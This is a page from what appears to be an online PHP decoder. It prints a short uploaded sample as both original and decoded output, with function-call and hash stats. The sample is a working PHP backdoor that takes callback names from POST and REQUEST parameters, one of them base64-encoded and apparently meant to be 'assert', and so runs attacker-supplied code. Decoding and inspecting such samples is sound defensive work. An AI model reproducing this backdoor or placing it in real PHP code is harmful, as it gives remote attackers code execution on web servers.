Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $act = $_POST['act']; $payload = array('test',$_POST['faith']); uasort($payload,..
Decoded Output download
<?php
$act = $_POST['act'];
$payload = array('test',$_POST['faith']);
uasort($payload, base64_decode($act));
#php5.4.8+assert
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['pass'] => 2);
uksort($arr, $e);
?>
Did this file decode correctly?
Original Code
<?php
$act = $_POST['act'];
$payload = array('test',$_POST['faith']);
uasort($payload, base64_decode($act));
#php5.4.8+assert
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['pass'] => 2);
uksort($arr, $e);
?>
Function Calls
| base64_decode | 1 |
Stats
| MD5 | 7420093cb0a07ec0651b9e49e1f8e734 |
| Eval Count | 0 |
| Decode Time | 101 ms |